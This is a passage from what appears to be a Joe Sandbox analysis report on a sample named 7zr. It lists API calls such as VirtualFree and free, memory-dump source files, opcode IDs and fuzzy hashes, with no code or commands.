                                                          • Instruction Fuzzy Hash: CAA012CCE01041019D0510343801523209262E06067D4C4F4680441105FA18D0082002
                                                          APIs
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B56BAC
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID:
                                                          • API String ID: 1263568516-0
                                                          • Opcode ID: c71393416eb581057df679bdbce22aea3b3503c94bd6930371ea89c13b27bcd0
                                                          • Instruction ID: 3ed933a70754ddf7c160f5ec3e37cb5af69f306637f534c82e83248d5d04292f
                                                          • Opcode Fuzzy Hash: c71393416eb581057df679bdbce22aea3b3503c94bd6930371ea89c13b27bcd0
                                                          • Instruction Fuzzy Hash: 5EA00278680700B7ED6067307D4FF593B247780F05F30854CB2456A0D06EE474849A9C
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: free
                                                          • String ID:
                                                          • API String ID: 1294909896-0
                                                          • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                                          • Instruction ID: 5452a898c97e844988764aa120d4d33733afd57307042e931e9337a0e5f31690
                                                          • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: free
                                                          • String ID:
                                                          • API String ID: 1294909896-0
                                                          • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                                          • Instruction ID: 5b16a8d25c558cd32ec97ef78b788b6af3345034608741ba6ca8814f4e76a3f3
                                                          • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                                          • Instruction Fuzzy Hash: